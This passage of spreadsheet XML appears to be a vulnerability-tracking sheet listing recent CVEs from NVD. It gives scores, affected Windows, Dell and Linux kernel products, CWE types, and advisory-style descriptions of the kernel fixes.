      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr"/>
      <c r="Q303" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>DataCube contained a path traversal issue affecting security feature enforcement. Software customers upgrade to resolved maintenance release. Update Content Extractor and Index Store.</t>
        </is>
      </c>
      <c r="S303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77091</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77489</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F304" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K30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4" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr"/>
      <c r="Q304" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77489</t>
        </is>
      </c>
    </row>
    <row r="305">
      <c r="A305" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B305" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C305" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77904</t>
        </is>
      </c>
      <c r="D305" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E305" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F305" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G305" s="5" t="inlineStr"/>
      <c r="H305" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I305" s="5" t="inlineStr"/>
      <c r="J305" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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5" s="5" t="inlineStr"/>
      <c r="M305" s="5" t="inlineStr"/>
      <c r="N305" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O305" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P305" s="5" t="inlineStr"/>
      <c r="Q305" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R305" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Volume Manager Extension Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S305" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77904</t>
        </is>
      </c>
    </row>
    <row r="306">
      <c r="A306" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B306" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C306" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78484</t>
        </is>
      </c>
      <c r="D306" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E306" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G306" s="5" t="inlineStr"/>
      <c r="H306" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I306" s="5" t="inlineStr"/>
      <c r="J306" s="5" t="inlineStr"/>
      <c r="K306" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L306" s="5" t="inlineStr"/>
      <c r="M306" s="5" t="inlineStr"/>
      <c r="N306" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O306" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P306" s="5" t="inlineStr"/>
      <c r="Q306" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R306"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S306" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78484</t>
        </is>
      </c>
    </row>
    <row r="307">
      <c r="A307" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B307" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C307" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78493</t>
        </is>
      </c>
      <c r="D307" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E307" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G307" s="5" t="inlineStr"/>
      <c r="H307" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="I307" s="5" t="inlineStr"/>
      <c r="J307" s="5" t="inlineStr"/>
      <c r="K307" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L307" s="5" t="inlineStr"/>
      <c r="M307" s="5" t="inlineStr"/>
      <c r="N307" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O307" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P307" s="5" t="inlineStr"/>
      <c r="Q307" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R307"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S307" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78493</t>
        </is>
      </c>
    </row>
    <row r="308">
      <c r="A308" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B308" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C308" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80075</t>
        </is>
      </c>
      <c r="D308" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E308" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F308" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G308" s="5" t="inlineStr"/>
      <c r="H308" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I308" s="5" t="inlineStr"/>
      <c r="J308" s="5" t="inlineStr"/>
      <c r="K308" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="L308" s="5" t="inlineStr"/>
      <c r="M308" s="5" t="inlineStr"/>
      <c r="N308" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O308" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P308" s="5" t="inlineStr"/>
      <c r="Q308" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R308" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Work Folders allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S308" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80075</t>
        </is>
      </c>
    </row>
    <row r="309">
      <c r="A309" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B309" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C309" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80178</t>
        </is>
      </c>
      <c r="D309" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E309" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G309" s="5" t="inlineStr"/>
      <c r="H309" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I309" s="5" t="inlineStr"/>
      <c r="J309" s="5" t="inlineStr"/>
      <c r="K309" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L309" s="5" t="inlineStr"/>
      <c r="M309" s="5" t="inlineStr"/>
      <c r="N309" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O309" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P309" s="5" t="inlineStr"/>
      <c r="Q309" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R309" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Privilege Management vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="S309" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80178</t>
        </is>
      </c>
    </row>
    <row r="310">
      <c r="A310" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B310" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C310" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80928</t>
        </is>
      </c>
      <c r="D310" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E310" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F310" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G310" s="5" t="inlineStr"/>
      <c r="H310" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I310" s="5" t="inlineStr"/>
      <c r="J310" s="5" t="inlineStr"/>
      <c r="K310" s="5" t="inlineStr"/>
      <c r="L310" s="5" t="inlineStr"/>
      <c r="M310" s="5" t="inlineStr"/>
      <c r="N310" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O310" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P310" s="5" t="inlineStr"/>
      <c r="Q310" s="5" t="inlineStr"/>
      <c r="R310" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
smack: fix cred UAF in smack_file_send_sigiotask()
When inspecting the credentials of another task, objective credentials
(-&gt;real_cred, accessed with __task_cred()) must always be used.
Accessing -&gt;cred on a non-current task is forbidden unless that task is
being created or destroyed; a task is allowed to change its own -&gt;cred
pointer with no synchronization, and changing -&gt;cred should only affect the
current syscall.
smack_file_send_sigiotask() was accessing both sets of credentials: First
tsk-&gt;cred, then __task_cred(tsk).
Fix it, always access the objective credentials here.
I have tested that this bug can lead to a KASAN-reported UAF of struct cred
in smack_file_send_sigiotask(), and that this fix prevents the race.</t>
        </is>
      </c>
      <c r="S310" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80928</t>
        </is>
      </c>
    </row>
    <row r="311">
      <c r="A311" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B311" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C311" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80929</t>
        </is>
      </c>
      <c r="D311" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E311" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F311" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G311" s="5" t="inlineStr"/>
      <c r="H311" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I311" s="5" t="inlineStr"/>
      <c r="J311" s="5" t="inlineStr"/>
      <c r="K311" s="5" t="inlineStr"/>
      <c r="L311" s="5" t="inlineStr"/>
      <c r="M311" s="5" t="inlineStr"/>
      <c r="N311" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O311" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P311" s="5" t="inlineStr"/>
      <c r="Q311" s="5" t="inlineStr"/>
      <c r="R311" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sysctl: move the "cad_pid" entry from pid_table[] to kern_reboot_table[]
cad_pid is global, and kill_cad_pid() is only used in the root namespace.
However, due to pid_table_root_permissions(), a non-root user can unshare
pid/user namespaces and modify it from the child namespace. This makes no
sense and is simply wrong.
Move it to kern_reboot_table[] where it logically belongs; this ensures
that only GLOBAL_ROOT_UID can read/modify this sysctl.
Note that this patch doesn't preserve "#ifdef CONFIG_PROC_SYSCTL" around
the "cad_pid"; CONFIG_PROC_SYSCTL selects CONFIG_SYSCTL, so it is always
set when kern_reboot_table[] is compiled.</t>
        </is>
      </c>
      <c r="S311" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80929</t>
        </is>
      </c>
    </row>
    <row r="312">
      <c r="A312" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B312" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C312" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80931</t>
        </is>
      </c>
      <c r="D312" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E312" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F312" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G312" s="5" t="inlineStr"/>
      <c r="H312" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I312" s="5" t="inlineStr"/>
      <c r="J312" s="5" t="inlineStr"/>
      <c r="K312" s="5" t="inlineStr"/>
      <c r="L312" s="5" t="inlineStr"/>
      <c r="M312" s="5" t="inlineStr"/>
      <c r="N312" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O312" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P312" s="5" t="inlineStr"/>
      <c r="Q312" s="5" t="inlineStr"/>
      <c r="R312" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
w1: ds28e17: reject an oversize length on an I2C block read
w1_f19_i2c_master_transfer() is the master_xfer for the DS28E17 1-Wire
to I2C bridge. On an I2C_M_RECV_LEN read, it takes the length from the
device. The downstream slave puts a length byte in buf[0]. The driver
then reads that many bytes into buf[1] with w1_f19_i2c_read().
buf[0] is controlled by the device and can be 0 to 255.
w1_f19_i2c_read() only rejects a zero count. The caller buffer is
I2C_SMBUS_BLOCK_MAX + 2, so 34 bytes. A length above 32 makes the read
run past it, up to about 222 bytes out of bounds.
The SMBus core does check buf[0] against I2C_SMBUS_BLOCK_MAX. That
check runs after master_xfer returns. By then the write is already
done. i2c-algo-bit rejects an oversize length before it copies, and
returns -EPROTO.
Reject a length above I2C_SMBUS_BLOCK_MAX at both RECV_LEN sites, the
same way i2c-algo-bit does.</t>
        </is>
      </c>
      <c r="S312" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80931</t>
        </is>
      </c>
    </row>
    <row r="313">
      <c r="A313" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B313" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C313" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80933</t>
        </is>
      </c>
      <c r="D313" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E313" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F313" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G313" s="5" t="inlineStr"/>
      <c r="H313" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I313" s="5" t="inlineStr"/>
      <c r="J313" s="5" t="inlineStr"/>
      <c r="K313" s="5" t="inlineStr"/>
      <c r="L313" s="5" t="inlineStr"/>
      <c r="M313" s="5" t="inlineStr"/>
      <c r="N313" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O313" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P313" s="5" t="inlineStr"/>
      <c r="Q313" s="5" t="inlineStr"/>
      <c r="R313" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7996: validate default EEPROM firmware size
The default EEPROM firmware is parsed and copied as a full EEPROM
without checking its length. A truncated file can make the driver
read beyond the firmware buffer during variant validation or the
fallback copy.
Reject files shorter than MT7996_EEPROM_SIZE before parsing or
copying the firmware.</t>
        </is>
      </c>
      <c r="S313" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80933</t>
        </is>
      </c>
    </row>
    <row r="314">
      <c r="A314" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B314" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C314" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80936</t>
        </is>
      </c>
      <c r="D314" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E314" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F314" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G314" s="5" t="inlineStr"/>
      <c r="H314" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I314" s="5" t="inlineStr"/>
      <c r="J314" s="5" t="inlineStr"/>
      <c r="K314" s="5" t="inlineStr"/>
      <c r="L314" s="5" t="inlineStr"/>
      <c r="M314" s="5" t="inlineStr"/>
      <c r="N314" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O314" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P314" s="5" t="inlineStr"/>
      <c r="Q314" s="5" t="inlineStr"/>
      <c r="R314" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mt76: mt7925: cancel mlo_pm_work on stop
mt7925 queues mlo_pm_work with a 5 second delay during multi-link
power-save setup and never cancels it on the stop path. If the device is
torn down inside that window, the work outlives the teardown and its timer
fires afterwards, trying to queue onto the workqueue that is already gone:
  workqueue: cannot queue mt7925_mlo_pm_work [mt7925_common] on wq phy0
  WARNING: kernel/workqueue.c:2283 at __queue_work+0x59/0xa0, CPU#1: swapper/1/0
   call_timer_fn+0x2a/0x140
   __run_timers+0x203/0x330
   run_timer_softirq+0x86/0xf0
mt7921 already has its own stop callback, so add one for mt7925 that
cancels the work before calling mt792x_stop(). mt7925_ops backs both the
PCIe and USB drivers, so this covers both.</t>
        </is>
      </c>
      <c r="S314" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80936</t>
        </is>
      </c>
    </row>
    <row r="315">
      <c r="A315" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B315" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C315" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80944</t>
        </is>
      </c>
      <c r="D315" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E315" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F315" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G315" s="5" t="inlineStr"/>
      <c r="H315" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I315" s="5" t="inlineStr"/>
      <c r="J315" s="5" t="inlineStr"/>
      <c r="K315" s="5" t="inlineStr"/>
      <c r="L315" s="5" t="inlineStr"/>
      <c r="M315" s="5" t="inlineStr"/>
      <c r="N315" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O315" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P315" s="5" t="inlineStr"/>
      <c r="Q315" s="5" t="inlineStr"/>
      <c r="R315" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: mwifiex: Detach sync cmd buffer on interrupted wait
mwifiex synchronous commands keep the caller-provided data buffer in
cmd_node-&gt;data_buf. Several callers pass stack-allocated objects there.
If wait_event_interruptible_timeout() is interrupted, the caller can
return and release that stack object while the firmware command is still
the current command. A late firmware response then reaches the normal
response handler, which can copy data through cmd_node-&gt;data_buf into the
stale stack address.
This fixes a stack corruption observed during repeated association and
disassociation cycles. The panic trace showed the command wait being
interrupted immediately before a bad pointer dereference:
  cmd_wait_q terminated: -512
  Unable to handle kernel paging request at virtual address 002c583837384662
  Kernel panic - not syncing: stack-protector: Kernel stack is corrupted
  ...
  Tainted: [M]=MACHINE_CHECK
The fault address decodes as little-endian ASCII:
  0x002c583837384662 -&gt; "bF878X,\0"
which is a fragment of the VERSION_EXT firmware string exposed as
debugfs "verext":
  w8997o-V4, RF878X, FP92, 16.92.21.p153.7
The same runs also showed corrupted control data containing:
  0x2400372e333531 -&gt; "153.7\0$"
which is the tail of the same VERSION_EXT string. This points at a late
VERSION_EXT response writing through a stale stack-backed data_buf after
the interrupted wait returned.
After cancelling pending commands on an interrupted or timed-out wait,
detach the caller-owned data buffer from the still-current command. This
preserves the existing command cancellation behaviour while preventing a
late response from writing through a pointer whose lifetime ended with the
waiting caller.
Tested on an i.MX8MP board using an 88W8997.</t>
        </is>
      </c>
      <c r="S315" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80944</t>
        </is>
      </c>
    </row>
    <row r="316">
      <c r="A316" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B316" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C316" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80947</t>
        </is>
      </c>
      <c r="D316" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E316" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F316" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G316" s="5" t="inlineStr"/>
      <c r="H316" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I316" s="5" t="inlineStr"/>
      <c r="J316" s="5" t="inlineStr"/>
      <c r="K316" s="5" t="inlineStr"/>
      <c r="L316" s="5" t="inlineStr"/>
      <c r="M316" s="5" t="inlineStr"/>
      <c r="N316" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O316" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P316" s="5" t="inlineStr"/>
      <c r="Q316" s="5" t="inlineStr"/>
      <c r="R316" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtl8xxxu: fix use-after-free from rx_urb_wq on stop
rtl8xxxu arms rx_urb_wq from the RX completion path:
rtl8xxxu_rx_complete() hands the URB to rtl8xxxu_queue_rx_urb(), which
queues it on rx_urb_pending_list and, once the list grows past
RTL8XXXU_RX_URB_PENDING_WATER, schedules rx_urb_wq.  The worker
rtl8xxxu_rx_urb_work() drains rx_urb_pending_list, recovers priv through
container_of, and resubmits each URB through rtl8xxxu_submit_rx_urb(),
which anchors it on rx_anchor and dereferences priv-&gt;udev.
rtl8xxxu_stop() cancels the sibling work items (c2hcmd_work, ra_watchdog,
update_beacon_work) but never cancels rx_urb_wq, so a worker armed during
the last burst of RX traffic can run rtl8xxxu_rx_urb_work() after
rtl8xxxu_disconnect() has called ieee80211_free_hw(), which frees priv,
producing a use-after-free.  The window opens under active RX traffic
(pending count above the watermark) followed by a disconnect.
There are two teardown races to close:
  * rtl8xxxu_queue_rx_urb() decided whether to enqueue under rx_urb_lock
    but called schedule_work() after dropping the lock.  A completion
    that observed shutdown == false and released the lock could then call
    schedule_work() after rtl8xxxu_stop() had set shutdown and
    cancel_work_sync() had already returned, arming the worker to run
    after the teardown.  Move schedule_work() under the same !shutdown
    branch so the arming decision is atomic with the shutdown check.
  * rtl8xxxu_rx_urb_work() anchors every URB it drained back onto
    rx_anchor through rtl8xxxu_submit_rx_urb().  A worker still running
    when usb_kill_anchored_urbs(&amp;priv-&gt;rx_anchor) returned would submit a
    URB that escaped the kill.  In rtl8xxxu_stop(), call
    cancel_work_sync(&amp;priv-&gt;rx_urb_wq) before the kill so the worker is
    drained first.
After priv-&gt;shutdown is set under rx_urb_lock, completions can no longer
queue rx_urb_wq. cancel_work_sync() then drains the last queued or running
worker, and the following usb_kill_anchored_urbs() kills the URBs it may
have submitted.
rtl8xxxu_disconnect() is covered because ieee80211_unregister_hw()
guarantees .stop() runs for a live interface before ieee80211_free_hw()
frees priv.  The probe error path needs no cancel: rx_urb_wq is
INIT_WORK()'d there but cannot have been scheduled, since no URB is
submitted before ieee80211_register_hw() succeeds.
This bug was found by static analysis.</t>
        </is>
      </c>
      <c r="S316" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80947</t>
        </is>
      </c>
    </row>
    <row r="317">
      <c r="A317" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B317" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C317" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80950</t>
        </is>
      </c>
      <c r="D317" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E317" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F317" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G317" s="5" t="inlineStr"/>
      <c r="H317" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I317" s="5" t="inlineStr"/>
      <c r="J317" s="5" t="inlineStr"/>
      <c r="K317" s="5" t="inlineStr"/>
      <c r="L317" s="5" t="inlineStr"/>
      <c r="M317" s="5" t="inlineStr"/>
      <c r="N317" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O317" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P317" s="5" t="inlineStr"/>
      <c r="Q317" s="5" t="inlineStr"/>
      <c r="R317" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
i3c: renesas: Check that the transfer is valid before accessing it
The Renesas I3C driver uses an asynchronous model to transfer data. It
prepares a struct renesas_i3c_xfer, enqueues it, and waits for completion.
The interrupt handler dequeues the transfer, updates/uses it, and signals
the waiting thread.
If the completion times out, the waiting thread dequeues the transfer and
free it. If an interrupt fires after that, the handler may access freed
memory, leading to crashes.
Check that the transfer is still valid before accessing it in the
interrupt handler. With it clear any status flags and disable all
the interrupts to avoid triggering the same interrupts again.</t>
        </is>
      </c>
      <c r="S317" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80950</t>
        </is>
      </c>
    </row>
    <row r="318">
      <c r="A318" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B318" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C318" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80952</t>
        </is>
      </c>
      <c r="D318" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E318" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
